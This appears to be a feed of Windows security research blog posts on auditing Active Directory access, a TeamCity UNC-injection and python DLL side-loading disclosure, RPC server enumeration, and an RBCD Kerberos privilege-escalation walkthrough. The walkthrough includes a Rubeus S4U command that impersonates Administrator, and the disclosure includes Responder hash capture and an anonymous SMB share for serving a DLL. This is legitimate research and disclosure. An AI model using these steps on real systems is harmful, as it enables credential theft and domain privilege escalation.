
Access Checking Active Directory

17 July 2022 at 04:49

Like many Windows-related technologies, Active Directory uses a security descriptor and the access check process to determine what access a user has to parts of the directory. Each object in the directory contains an nTSecurityDescriptor attribute which stores the binary representation of the security descriptor. When a user accesses the object through LDAP the remote user's token is used with the security descriptor to determine if they have the rights to perform the operation they're requesting.

Weak security descriptors are a common misconfiguration that could result in the entire domain being compromised. Therefore it's important for an administrator to be able to find and remediate security weaknesses. Unfortunately Microsoft doesn't provide a means for an administrator to audit the security of AD, at least not in any default tool I know of. There is third-party tooling, such as Bloodhound, which will perform this analysis offline, but from reading the implementation of their checking they don't tend to use the real access check APIs and so likely miss some misconfigurations.

I wrote my own access checker for AD which is included in my NtObjectManager PowerShell module. I've used it to find a few vulnerabilities, such as CVE-2021-34470 which was an issue with Exchange's changes to AD. This works "online", as in you need to have an active account in the domain to run it; however, AFAIK it should provide the most accurate results if what you're interested in is what access a specific user has to AD objects. While the command is available in the module it's perhaps not immediately obvious how to use it and interpret the results, therefore I decided I should write a quick blog post about it.

A Complex Process

The access check process is mostly documented by Microsoft in [MS-ADTS]: Active Directory Technical Specification. Specifically in section 5.1.3. However, this leaves many questions unanswered. I'm not going to go through how it works in full either, but let me give a quick overview.  I'm going to assume you have a basic knowledge of the structure of the AD and its objects.

An AD object contains many resources on which access might need to be granted or denied for a particular user. For example you might want to allow the user to create only certain types of child objects, or only modify certain attributes. There are many ways that Microsoft could have implemented security, but they decided on extending the ACL format to introduce the object ACE. For example the ACCESS_ALLOWED_OBJECT_ACE structure adds two GUIDs to the normal ACCESS_ALLOWED_ACE.

The first GUID, ObjectType, indicates the type of object that the ACE applies to. For example it can be set to the schema ID of an attribute, in which case the ACE grants access to only that attribute and nothing else. The second GUID, InheritedObjectType, is only used during ACL inheritance. It represents the schema ID of the object class that is allowed to inherit this ACE. For example if it's set to the schema ID of the computer class, then the ACE will only be inherited if a computer object is created; it will not be if, say, a user object is created instead. We only need to care about the first of these GUIDs when doing an access check.

To perform an access check you need to use an API such as AccessCheckByType which supports checking the object ACEs. When calling the API you pass a list of object type GUIDs you want to check for access on. When processing the DACL if an ACE has an ObjectType GUID which isn't in the passed list it'll be ignored. Otherwise it'll be handled according to the normal access check rules. If the ACE isn't an object ACE then it'll also be processed.
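To make the filtering rule concrete, here's a minimal Python sketch of the per-ACE logic described above. This is my own simplification of the real AccessCheckByType (no generic mapping, no SACL; first-match-wins per access bit), and all GUIDs and masks are made up for illustration.

```python
def access_check_by_type(dacl, requested_object_types):
    """Simplified sketch of AccessCheckByType's DACL walk.

    Object ACEs whose ObjectType GUID isn't in the requested list are
    ignored; non-object ACEs (object_type of None) are always processed.
    Per access bit, the first matching ACE (allow or deny) wins.
    """
    granted, denied = 0, 0
    for ace in dacl:
        obj_type = ace.get("object_type")
        if obj_type is not None and obj_type not in requested_object_types:
            continue  # object ACE for a type we didn't ask about
        if ace["type"] == "deny":
            denied |= ace["mask"] & ~granted
        else:
            granted |= ace["mask"] & ~denied
    return granted

READ_PROP, WRITE_PROP = 0x10, 0x20
dacl = [
    # Deny ACE scoped to a different attribute GUID, so it's skipped
    # when we only ask about "guid-attr-1".
    {"type": "deny", "mask": WRITE_PROP, "object_type": "guid-attr-2"},
    {"type": "allow", "mask": READ_PROP | WRITE_PROP, "object_type": "guid-attr-1"},
]
access_check_by_type(dacl, {"guid-attr-1"})  # -> 0x30
```

Asking about both attribute GUIDs instead would bring the deny ACE into play and reduce the grant to READ_PROP only.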

If all you want to do is check if a local user has access to a specific object or attribute then it's pretty simple. Just get the access token for that user, add the object's GUID to the list and call the access check API. The resulting granted access can be one of the following specific access rights; note the names in parentheses are the ones I use in the PowerShell module for simplicity:
  • ACTRL_DS_CREATE_CHILD (CreateChild) - Create a new child object
  • ACTRL_DS_DELETE_CHILD (DeleteChild) - Delete a child object
  • ACTRL_DS_LIST (List) - Enumerate child objects
  • ACTRL_DS_SELF (Self) - Grant a write-validated extended right
  • ACTRL_DS_READ_PROP (ReadProp) - Read an attribute
  • ACTRL_DS_WRITE_PROP (WriteProp) - Write an attribute
  • ACTRL_DS_DELETE_TREE (DeleteTree) - Delete a tree of objects
  • ACTRL_DS_LIST_OBJECT (ListObject) - List a tree of objects
  • ACTRL_DS_CONTROL_ACCESS (ControlAccess) - Grant a control extended right
You can also be granted standard rights such as READ_CONTROL, WRITE_DAC or DELETE which do what you'd expect them to do. However, if you want to see what the maximum granted access on the DC would be it's slightly more difficult. We have the following problems:
  • The list of groups granted to a local user is unlikely to match what they're granted on the DC where the real access check takes place.
  • AccessCheckByType only returns a single granted access value; if we have a lot of object types to test it'd be quite expensive to call it hundreds if not thousands of times for a single security descriptor.
While you could solve the first problem by having sufficient local privileges to manually create an access token, and the second by using an API which returns a list of granted access such as AccessCheckByTypeResultList, there's a "simpler" solution. You can use the Authz APIs, which allow you to manually build a security context with any groups you like without needing to create an access token, and the AuthzAccessCheck API supports returning a list of granted access for each object in the type list. It just so happens that this API is the one used by the AD LDAP server itself.

Therefore to perform a "correct" maximum access check you need to do the following steps.
  1. Enumerate the user's group list for the DC from the AD. Local group assignments are stored in the directory's CN=Builtin container.
  2. Build an Authz security context with the group list.
  3. Read a directory object's security descriptor.
  4. Read the object's schema class and build a list of specific schema objects to check:
  • All attributes from the class and its super, auxiliary and dynamic auxiliary classes.
  • All allowable child object classes.
  • All assignable control, write-validated and property set extended rights.
  5. Convert the gathered schema information into the object type list for the access check.
  6. Run the access check and handle the results.
  7. Repeat from 3 for every object you want to check.

Trust me when I say this process is actually easier said than done. There are many nuances that produce surprising results; I guess this is why most tooling just doesn't bother. Also my code includes a fair amount of knowledge gathered from reverse engineering the real implementation, but I'm sure I could have missed something.
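As a rough illustration of the schema-to-type-list conversion step, the gathered schema information ends up as a hierarchical object type list: level 0 is the object's class, level 1 entries are property sets (or extended rights), and level 2 entries are individual attributes. The helper and GUID strings below are hypothetical, just to show the shape of the list the access check APIs consume:

```python
def build_object_type_list(class_guid, property_sets):
    """Flatten schema info into (level, guid) pairs in depth-first
    order, so that a grant on a level-1 property set propagates down
    to its level-2 attributes during the access check."""
    otl = [(0, class_guid)]
    for set_guid, attr_guids in property_sets.items():
        otl.append((1, set_guid))
        otl.extend((2, attr) for attr in attr_guids)
    return otl

otl = build_object_type_list(
    "class-user",  # schema ID of the object's class (made up)
    {
        "pset-personal-info": ["attr-telephone", "attr-street"],
        "pset-logon-info": ["attr-script-path"],
    },
)
# otl -> [(0, 'class-user'), (1, 'pset-personal-info'),
#         (2, 'attr-telephone'), (2, 'attr-street'),
#         (1, 'pset-logon-info'), (2, 'attr-script-path')]
```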

    Using Get-AccessibleDsObject and Interpreting the Results

    Let's finally get to using the PowerShell command which is the real purpose of this blog post. For a simple check run the following command. This can take a while on the first run to gather information about the domain and the user.

    PS> Get-AccessibleDsObject -NamingContext Default
    Name   ObjectClass UserName       Modifiable Controllable
    ----   ----------- --------       ---------- ------------
    domain domainDNS   DOMAIN\alice   False      True

    This uses the NamingContext property to specify what object to check. The property allows you to easily specify the three main directories: Default, Configuration and Schema. You can also use the DistinguishedName property to specify an explicit DN, and the Domain property to specify the domain for the LDAP server if you don't want to inspect the current user's domain. Finally, you can specify the Recurse property to recursively enumerate objects; in this case we just access check the root object.

    The access check defaults to using the current user's groups, based on what they would be on the DC. This is obviously important, especially if the current user is a local administrator as they wouldn't be guaranteed to have administrator rights on the DC. You can specify different users to check either by SID using the UserSid property, or names using the UserName property. These properties can take multiple values which will run multiple checks against the list of enumerated objects. For example to check using the domain administrator you could do the following:

    PS> Get-AccessibleDsObject -NamingContext Default -UserName DOMAIN\Administrator
    Name   ObjectClass UserName             Modifiable Controllable
    ----   ----------- --------             ---------- ------------
    domain domainDNS   DOMAIN\Administrator True       True

    The basic table format for the access check results shows five columns: the common name of the object, its schema class, the user that was checked, and whether the access check resulted in any modifiable or controllable access being granted. Modifiable covers things like being able to write attributes or create/delete child objects. Controllable indicates one or more controllable extended rights were granted to the user, such as allowing the user's password to be changed.

    As this is PowerShell the access check result is an object with many properties. The following properties are probably the ones of most interest when determining what access is granted to the user.
    • GrantedAccess - The granted access when only specifying the object's schema class during the check. If an access is granted at this level it'd apply to all values of that type, for example if WriteProp is granted then any attribute in the object can be written by the user.
    • WritableAttributes - The list of attributes a user can modify.
    • WritablePropertySets - The list of writable property sets a user can modify. Note that this is more for information purposes, the modifiable attributes will also be in the WritableAttributes property which is going to be easier to inspect.
    • GrantedControl - The list of control extended rights granted to a user.
    • GrantedWriteValidated - The list of write validated extended rights granted to a user.
    • CreateableClasses - The list of child object classes that can be created.
    • DeletableClasses - The list of child object classes that can be deleted.
    • DistinguishedName - The full DN of the object.
    • SecurityDescriptor - The security descriptor used for the check.
    • TokenInfo - The user's information used in the check, such as the list of groups.
    The command should be pretty easy to use. That said, it does come with a few caveats. First, you can only use the command with direct access to the AD using a domain account. Technically there's no reason you couldn't implement a gatherer like Bloodhound and do the access check offline, but I just haven't. I've also not tested it in weirder setups such as complex domain hierarchies or RODCs.

    If you're using a low-privileged user there are likely to be AD objects that you can't enumerate or read the security descriptor from. This means the results are going to depend on the user you use to enumerate with. The best results would come from using a domain/enterprise administrator with full access to everything.

    Based on my testing, when I've found an access granted to a user it seems to be real; however, it's possible I'm not always 100% correct or that I'm missing accesses. Also it's worth noting that just having access doesn't mean there isn't some extra checking done by the LDAP server. For example there's an explicit block on creating Group Managed Service Accounts in Computer objects, even though that child object class might seem to be creatable.

    A case of DLL Side Loading from UNC via Windows environmental variable

    5 July 2022 at 15:51

    About a month ago I decided to take a look at JetBrains TeamCity, as I wanted to learn more about CVE-2022-25263 (an authenticated OS Command Injection in the Agent Push functionality).

    Initially I just wanted to find the affected feature and test the mitigation put in place. Eventually I ended up searching for other interesting behaviors that could be considered security issues, and came across something I believed was a vulnerability; however, upon disclosure the vendor convinced me that the situation was considered normal in TeamCity's context and its threat model. The feature I was testing allowed me to set some of the environmental variables later passed to the given build step process (in my case it was python.exe).

    During that process I accidentally discovered that Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed to by the SystemRoot environment variable passed to the process (it loads %SystemRoot%/system32/rsaenh.dll).
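The probe path is just the inherited environment variable joined with a fixed suffix, which is why a UNC value works. A small Python illustration of the path construction (the helper name is mine; the actual lookup happens inside the Windows loader/CRT, not in code like this):

```python
import ntpath

def rsaenh_probe_path(environ):
    # The process inherits SystemRoot from its (attacker-controlled)
    # environment and the fixed system32\rsaenh.dll suffix is appended.
    system_root = environ.get("SystemRoot", r"C:\WINDOWS")
    return ntpath.join(system_root, "system32", "rsaenh.dll")

rsaenh_probe_path({"SystemRoot": r"\\192.168.99.5\pub"})
# -> r'\\192.168.99.5\pub\system32\rsaenh.dll' (a remote SMB share)
```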

    For the purpose of testing, I installed TeamCity on Windows 10 64-bit, with default settings, setting both the TeamCity Server and the TeamCity Build Agent to run as a regular user (which is the default setting).

    I used the same system for both the TeamCity Server and the Build Agent.
    First, as admin, I created a sample project with one build step of type Python.
    I installed Python3 (python3.10 from the Microsoft App Store, checking the box to get it added to the PATH), so the agent would be able to run the build. I also created a hello world python build script:

    From that point I switched to a regular user account, which was not allowed to define or edit build steps, but only to trigger them, with the ability to control custom build parameters (including some environmental variables).

    I came across two separate instances of UNC path injection, allowing me to attack the Build Agent. In both cases I could make the system connect via SMB to the share of my choosing (allowing me to capture the NTLM hash, so I could try to crack it offline or SMB-relay it).

    In case of build steps utilizing python, it also turned out possible to load an arbitrary DLL file from the share I set up with smbd hosted from the KALI box.


    The local IP address of the Windows system was 192.168.99.4. I ran a KALI Linux box in the same network, under 192.168.99.5.

    Injecting UNC to capture the hash / NTLM-relay

    On the KALI box, I ran responder with default settings, like this:

    Then, before running the build, I set the teamcity.build.checkoutDir parameter to \\192.168.99.5\pub:

    I also ran Procmon and set up a filter to catch any events with the "Path" attribute containing "192.168.99.5".
    I clicked "Run Build", which resulted in the UNC path being read by the service, as shown in the screenshot below:

    Responder successfully caught the hash (multiple times):

    I noticed that teamcity.build.checkoutDir was validated and would ultimately not be used to load the build script (which was what I was trying to achieve in the first place by tampering with it); the application fell back on the default value C:\TeamCity\buildAgent\work\2b35ac7e0452d98f when running the build. Still, before validation, the service interacted with the share, which I believe should not be the case.

    Injecting UNC to load arbitrary DLL

    I discovered I could attack the Build Agent by poisoning environmental variables the same way as I attacked the server, via build parameter customization.
    Since my build step used python, I played with it a bit to see if I could influence the way it loads DLLs by changing environmental variables. It turned out I could.

    Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process.

    For example, by setting the SystemRoot environmental variable to "\\192.168.99.5\pub" (from the default "C:\WINDOWS" value):

    In case of python3.10.exe, this resulted in the python executable trying to load \\192.168.99.5\pub\system32\rsaenh.dll:

    With Responder running, just like in case of attacking the TeamCity Server, hashes were captured:

    However, since python3.10 looked eager to load a DLL from a path that could be controlled with the SystemRoot variable, I decided to spin up an SMB share with public anonymous access and provide a copy of the original rsaenh.dll file into the pub\system32\ directory shared with SMB.
    I used the following /etc/samba/smb.conf:

    [global]

    workgroup = WORKGROUP
    log file = /var/log/samba/log.%m
    max log size = 1000
    logging = file
    panic action = /usr/share/samba/panic-action %d
    server role = standalone server
    map to guest = bad user
    [pub]
    comment = some useful files
    read only = no
    path = /home/pub
    guest ok = yes
    create mask = 0777
    directory mask = 0777

    I stopped Responder to free up port 445, then started smbd:

    service smbd start

    Then, I ran the build again, and had the python3.10 executable successfully load and execute the DLL from my share, demonstrating a vector of RCE on the Build Agent:

    Not an issue from TeamCity perspective

    About a week after reporting the issue to the vendor, I received a response clarifying that any user with access to TeamCity is considered to have access to all build agent systems; therefore code execution on any build agent system, triggered by a low-privileged user in TeamCity, does not violate any security boundaries. They also provided an example of an earlier, very similar submission, and the clarification that was given upon its closure: https://youtrack.jetbrains.com/issue/TW-74408 (with a nice code injection vector via a perl environmental variable).

    python loading rsaenh.dll following the SystemRoot env variable

    The fact that python used an environmental variable to load a DLL is an interesting occurrence on its own, as it could be used locally as an evasive technique alternative to rundll32.exe (https://attack.mitre.org/techniques/T1574/002/, https://attack.mitre.org/techniques/T1129/) - to inject malicious code into a process created from an original, signed python3.10.exe executable.

    POC

    The following code was used to build the DLL. It simply grabs the current username and current process command line, and appends them to a text file named poc.txt. Whenever DllMain is executed, for whatever reason, the poc.txt file will be appended with a line containing those details:

    First, let's try to get it loaded without any signatures, locally:

    Procmon output watching for any events with Path ending with "rsaenh.dll":

    The poc.txt file was created in the current directory of C:\Users\ewilded\HACKING\SHELLING\research\cmd.exe\python3_side_loading_via_SystemRoot while running python:

    Similar cases

    There must be more cases of popular software using environmental variables to locate some of the shared libraries they load.

    To perform such a search dynamically, all executables in the scope directory could be iterated through and executed multiple times, each time testing arbitrary values set on individual common environmental variables like %SystemRoot% or %WINDIR%. This alone would be a good approach for starters, but it would definitely not provide exhaustive coverage - most of the places in code where those load attempts happen are not reachable without hitting proper command lines, specific to each executable.

    A more exhaustive, but also more demanding, approach would be static analysis of all PE files in scope that indicate the usage of both LoadLibrary and GetEnv functions (e.g. LoadLibraryExW() and _wgetenv(), as python3.10.exe does) in their import tables.
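A crude way to shortlist candidates for that static pass is to grep executables for both a LoadLibrary-style and a getenv-style import name. This is my own simplification (it scans raw bytes rather than properly parsing the PE import directory, so expect false positives and missed delay-loaded or obfuscated imports):

```python
import pathlib

LOAD_FUNCS = (b"LoadLibraryExW", b"LoadLibraryW", b"LoadLibraryA")
ENV_FUNCS = (b"_wgetenv", b"getenv", b"GetEnvironmentVariableW")

def looks_interesting(path):
    # Candidate if the file mentions both a LoadLibrary* name and a
    # getenv-style name anywhere in its bytes.
    data = pathlib.Path(path).read_bytes()
    return any(f in data for f in LOAD_FUNCS) and any(f in data for f in ENV_FUNCS)

def scan_directory(root):
    # Walk the scope directory and keep only the candidate executables.
    return sorted(p for p in pathlib.Path(root).rglob("*.exe")
                  if looks_interesting(p))
```

Anything this flags would still need the dynamic confirmation described above, since the presence of both imports doesn't prove one feeds the other.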

    Finding Running RPC Server Information with NtObjectManager

    26 June 2022 at 21:56

    When doing security research I regularly use my NtObjectManager PowerShell module to discover and call RPC servers on Windows. Typically I'll use the Get-RpcServer command, passing the name of a DLL or EXE file to extract the embedded RPC servers. I can then use the returned server objects to create a client to access the server and call its methods. A good blog post about how some of this works was written recently by blueclearjar.

    Using Get-RpcServer only gives you a list of what RPC servers could possibly be running, not whether they are running and, if so, in what process. This is where RpcView does better, as it parses a process' in-memory RPC structures to find what is registered and where. Unfortunately this is something I'm yet to implement in NtObjectManager.

    However, it turns out there are various ways to get the running RPC server information, provided by the OS and the RPC runtime, which we can use to get a more or less complete list of running servers. I've exposed all the ones I know about with some recent updates to the module. Let's go through the various ways you can piece together this information.

    NOTE: some of the examples of PowerShell code will need a recent build of the NtObjectManager module. For various reasons I've not been updating the version on the PS Gallery, so get the source code from github and build it yourself.

    RPC Endpoint Mapper

    If you're lucky this is the simplest way to find out if a particular RPC server is running. When an RPC server is started the service can register an RPC interface with the function RpcEpRegister, specifying the interface UUID and version along with the binding information, with the RPC endpoint mapper service running in RPCSS. This registers all current RPC endpoints the server is listening on, keyed against the RPC interface.

    You can query the endpoint table using the RpcMgmtEpEltInqBegin and RpcMgmtEpEltInqNext APIs. I expose this through the Get-RpcEndpoint command. Running Get-RpcEndpoint with no parameters returns all interfaces the local endpoint mapper knows about as shown below.

    PS> Get-RpcEndpoint
    UUID                                 Version Protocol     Endpoint      Annotation
    ----                                 ------- --------     --------      ----------
    51a227ae-825b-41f2-b4a9-1ac9557a1018 1.0     ncacn_ip_tcp 49669         
    0497b57d-2e66-424f-a0c6-157cd5d41700 1.0     ncalrpc      LRPC-5f43...  AppInfo
    201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0     ncalrpc      LRPC-5f43...  AppInfo
    ...

    Note that in addition to the interface UUID and version the output shows the binding information for the endpoint, such as the protocol sequence and endpoint. There is also a free form annotation field, but that can be set to anything the server likes when it calls RpcEpRegister.

    The APIs also allow you to specify a remote server hosting the endpoint mapper. You can use this to query what RPC servers are running on a remote server, assuming the firewall doesn't block you. To do this you'd need to specify a binding string for the SearchBinding parameter as shown.

    PS> Get-RpcEndpoint -SearchBinding 'ncacn_ip_tcp:primarydc'
    UUID                                 Version Protocol     Endpoint     Annotation
    ----                                 ------- --------     --------     ----------
    d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0     ncacn_ip_tcp 49664
    5b821720-f63b-11d0-aad2-00c04fc324db 1.0     ncacn_ip_tcp 49688
    650a7e26-eab8-5533-ce43-9c1dfce11511 1.0     ncacn_np     \PIPE\ROUTER Vpn APIs
    ...
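The SearchBinding value above follows the RPC string binding format, roughly protseq:networkaddr[endpoint]. Here's a small hedged parser to show the pieces; it deliberately ignores the optional object UUID prefix and endpoint options the full syntax allows:

```python
import re

# Simplified grammar: protseq ":" networkaddr [ "[" endpoint "]" ]
BINDING_RE = re.compile(
    r"^(?P<protseq>[^:]+):(?P<addr>[^\[]*)(?:\[(?P<endpoint>[^\]]*)\])?$")

def parse_string_binding(binding):
    m = BINDING_RE.match(binding)
    if m is None:
        raise ValueError(f"malformed binding: {binding!r}")
    return m.groupdict()

parse_string_binding("ncacn_ip_tcp:primarydc[135]")
# -> {'protseq': 'ncacn_ip_tcp', 'addr': 'primarydc', 'endpoint': '135'}
```

When no endpoint is given, as in the SearchBinding example, the runtime asks the remote endpoint mapper on its well-known port to resolve one.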

    The big issue with the RPC endpoint mapper is it only contains RPC interfaces which were explicitly registered against an endpoint. The server could contain many more interfaces which could be accessible, but as they weren't registered they won't be returned from the endpoint mapper. Registration will typically only be used if the server is using an ephemeral name for the endpoint, such as a random TCP port or auto-generated ALPC name.

    Pros:

    • Simple command to run to get a good list of running RPC servers.
    • Can be run against remote servers to find out remotely accessible RPC servers.
    Cons:
    • Only returns the RPC servers intentionally registered.
    • Doesn't directly give you the hosting process, although the optional annotation might give you a clue.
    • Doesn't give you any information about what the RPC server does; you'll need to find what executable it's hosted in and parse it using Get-RpcServer.

    Service Executable

    If the RPC servers you extract are in a registered system service executable then the module will try and work out what service that corresponds to by querying the SCM. The default output from the Get-RpcServer command will show this as the Service column shown below.

    PS> Get-RpcServer C:\windows\system32\appinfo.dll
    Name        UUID                                 Ver Procs EPs Service Running
    ----        ----                                 --- ----- --- ------- -------
    appinfo.dll 0497b57d-2e66-424f-a0c6-157cd5d41700 1.0 7     1   Appinfo True
    appinfo.dll 58e604e8-9adb-4d2e-a464-3b0683fb1480 1.0 1     1   Appinfo True
    appinfo.dll fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 1     1   Appinfo True
    appinfo.dll 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 1     1   Appinfo True
    appinfo.dll 201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0 7     1   Appinfo True

    The output also shows that the appinfo.dll executable is the implementation of the Appinfo service, which is the general name for the UAC service. Note that it also shows whether the service is running, but that's just for convenience. You can use this information to find what process is likely to be hosting the RPC server by querying for the service PID if it's running.

    PS> Get-Win32Service -Name Appinfo
    Name    Status  ProcessId
    ----    ------  ---------
    Appinfo Running 6020

    The output also shows that each of the interfaces has an endpoint which is registered against the interface UUID and version. This is extracted from the endpoint mapper, so again it's only there for convenience. However, if you pick an executable which isn't a service implementation the results are less useful:

    PS> Get-RpcServer C:\windows\system32\efslsaext.dll
    Name          UUID                   Ver Procs EPs Service Running      
    ----          ----                   --- ----- --- ------- -------      
    efslsaext.dll c681d488-d850-11d0-... 1.0 21    0           False

    The efslsaext.dll contains one of the EFS implementations, which are all hosted in LSASS. However, it's not a registered service so the output doesn't show any service name, and it's also not registered with the endpoint mapper so doesn't show any endpoints, even though it is running.

    Pros:

    • If the executable's a service it gives you a good idea of who's hosting the RPC servers and if they're currently running.
    • You can get the RPC server interface information along with that information.
    Cons:
    • If the executable isn't a service it doesn't directly help.
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • Even if the service is running it might not have enabled the RPC servers.

    Enumerating Process Modules

    Extracting the RPC servers from an arbitrary executable is fine offline, but what if you want to know what RPC servers are running right now? This is similar to RpcView's process list GUI: you can look at a process and find all the services running within it.

    It turns out there's a really obvious way of getting a list of the potential services running in a process: enumerate the loaded DLLs using an API such as EnumerateLoadedModules, and then run Get-RpcServer on each one to extract the potential services. To use the APIs you'd need at least read access to the target process, which means you'd really want to be an administrator, but that's no different to RpcView's limitations.

    The big problem is just because a module is loaded it doesn't mean the RPC server is running. For example the WinHTTP DLL has a built-in RPC server which is only loaded when running the WinHTTP proxy service, but the DLL could be loaded in any process which uses the APIs.

    To simplify things I expose this approach through the Get-RpcServer function with the ProcessId parameter. You can also use the ServiceName parameter to lookup a service PID if you're interested in a specific service.

    PS> Get-RpcServer -ServiceName Appinfo
    Name        UUID                        Ver Procs EPs Service Running
    ----        ----                        --- ----- --- ------- -------
    RPCRT4.dll  afa8bd80-7d8a-11c9-bef4-... 1.0 5     0           False
    combase.dll e1ac57d7-2eeb-4553-b980-... 0.0 0     0           False
    combase.dll 00000143-0000-0000-c000-... 0.0 0     0           False

    Pros:

    • You can determine all RPC servers which could be potentially running for an arbitrary process.
    Cons:
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • You can't directly enumerate the module list, except for the main executable, from a protected process (there are various tricks to do so, but they're out of scope here).

    Asking an RPC Endpoint Nicely

    The final approach is just to ask an RPC endpoint nicely to tell you what RPC servers it supports. We don't need to go digging into the guts of a process to do this; all we need is the binding string for the endpoint we want to query, which we can then pass to the RpcMgmtInqIfIds API.

    This will only return the UUID and version of the RPC servers accessible from the endpoint, not the full RPC server information. But it will give you an exact list of all supported RPC servers; in fact it's so detailed it'll give you all the COM interfaces the process is listening on as well. To query this list you only need access to the endpoint transport, not the process itself.

    How do you get the endpoints though? One approach, if you do have access to the process, is to enumerate its server ALPC ports by getting a list of handles for the process, finding the ports with the \RPC Control\ prefix in their name and then using that to form the binding string. This approach is exposed through Get-RpcEndpoint's ProcessId parameter. Again it also supports a ServiceName parameter to simplify querying services.

    PS> Get-RpcEndpoint -ServiceName AppInfo
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    If you don't have access to the process you can do it in reverse by enumerating potential endpoints and querying each one, for example by enumerating the \RPC Control object directory. Since Windows 10 19H1 ALPC clients can also query the server's PID, so you can not only find the exposed RPC servers but also what process they're running in. To query from the name of an ALPC port use the AlpcPort parameter with Get-RpcEndpoint.

    PS> Get-RpcEndpoint -AlpcPort LRPC-0ee3261d56342eb7ac
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...
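Turning an ALPC server port's object manager name into the ncalrpc binding string you'd query is just string manipulation; a sketch (the port name is made up):

```python
ALPC_PREFIX = "\\RPC Control\\"

def alpc_port_to_binding(port_name):
    # Strip the object directory prefix and wrap the remainder in the
    # ncalrpc string binding endpoint syntax.
    if port_name.startswith(ALPC_PREFIX):
        port_name = port_name[len(ALPC_PREFIX):]
    return f"ncalrpc:[{port_name}]"

alpc_port_to_binding("\\RPC Control\\LRPC-0ee3261d56342eb7ac")
# -> 'ncalrpc:[LRPC-0ee3261d56342eb7ac]'
```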

    Pros:

    • You can determine exactly what RPC servers are running in a process.
    Cons:
    • You can't directly determine what the RPC server does as the list gives you no information about which module is hosting it.

    Combining Approaches

    Obviously no one approach is perfect. However, you can get most of the way towards RpcView's process list by combining the module enumeration approach with asking the endpoint nicely. For example, you could first get a list of potential interfaces by enumerating the modules and parsing the RPC servers, then filter that list to only the ones which are running by querying the endpoint directly. This will also get you a list of the ALPC server ports that the RPC server is running on so you can directly connect to it with a manually built client. An example script for doing this is on github.

    We are still missing some crucial information that RpcView can access, such as the interface registration flags, which none of these approaches expose. Still, hopefully that gives you a few ways to approach analyzing the RPC attack surface of the local system and determining what endpoints you can call.

    Exploiting RBCD Using a Normal User Account*

    14 May 2022 at 02:29

    * Caveats apply.

    Resource Based Constrained Delegation (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post, is a devious way of exploiting Kerberos to elevate privileges on a local Windows machine. All it requires is write access to the local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to add another account's SID. You can then use that account with the Services For User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain, including local administrators. From there you can create a new service or whatever else you need to do.

    The key is how you write to the LDAP server under the local computer's domain account. There have been various approaches, usually abusing authentication relay. For example, I described one relay vector which abused DCOM. Someone else has since put this together in a turnkey tool, KrbRelayUp.

    One additional criterion for this to work is having access to another computer account to perform the attack. Well, this isn't strictly true; there's the Shadow Credentials attack which allows you to reuse the same local computer account, but in general you need a computer account you control. Normally this isn't a problem, as the DC allows normal users to create new computer accounts up to a limit set by the domain's ms-DS-MachineAccountQuota attribute value. This attribute defaults to 10, but an administrator could set it to 0 and block the attack, which is probably recommended.

    But I wondered why this wouldn't work as a normal user. The msDS-AllowedToActOnBehalfOfOtherIdentity attribute just needs the SID of the account to be allowed to delegate to the computer. Why can't we just add the user's SID and perform the S4U dance? To give us the best chance I'll assume we have knowledge of a user's password; how you get this is entirely up to you. Running the attack through Rubeus shows our problem.

    PS C:\> Rubeus.exe s4u /user:charlie /domain:domain.local /dc:primarydc.domain.local /rc4:79bf93c9501b151506adc21ba0397b33 /impersonateuser:Administrator /msdsspn:cifs/WIN10TEST.domain.local

       ______        _
      (_____ \      | |
       _____) )_   _| |__  _____ _   _  ___
      |  __  /| | | |  _ \| ___ | | | |/___)
      | |  \ \| |_| | |_) ) ____| |_| |___ |
      |_|   |_|____/|____/|_____)____/(___/
      v2.0.3
    [*] Action: S4U
    [*] Using rc4_hmac hash: 79bf93c9501b151506adc21ba0397b33
    [*] Building AS-REQ (w/ preauth) for: 'domain.local\charlie'
    [*] Using domain controller: 10.0.0.10:88
    [+] TGT request successful!
    [*] base64(ticket.kirbi):
          doIFc...
    [*] Action: S4U
    [*] Building S4U2self request for: '[email protected]'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2self request to 10.0.0.10:88
    [X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
    [X] S4U2Self failed, unable to perform S4U2Proxy.

    We don't even get past the first S4U2Self stage of the attack; it fails with a KDC_ERR_S_PRINCIPAL_UNKNOWN error. This error typically indicates the KDC doesn't know what encryption key to use for the generated ticket. If you add an SPN to the user's account, however, it all succeeds. This would imply it's not a problem with a user account per se, but instead just a problem of the KDC not being able to select the correct key.

    Technically speaking there should be no reason that the KDC couldn't use the user's long term key if you requested a ticket for their UPN, but it doesn't (contrary to an argument I had on /r/netsec the other day with someone who was adamant that SPNs are a convenience, not a fundamental requirement of Kerberos).

    So what to do? There is a way of getting a ticket encrypted for a UPN by using the User 2 User (U2U) extension. Would this work here? Looking at the Rubeus code it seems requesting a U2U S4U2Self ticket is supported, but the parameters are not set for the S4U attack. Let's set those parameters to request a U2U ticket and see if it works.

    [+] S4U2self success!
    [*] Got a TGS for 'Administrator' to '[email protected]'
    [*] base64(ticket.kirbi): doIF...bGll

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
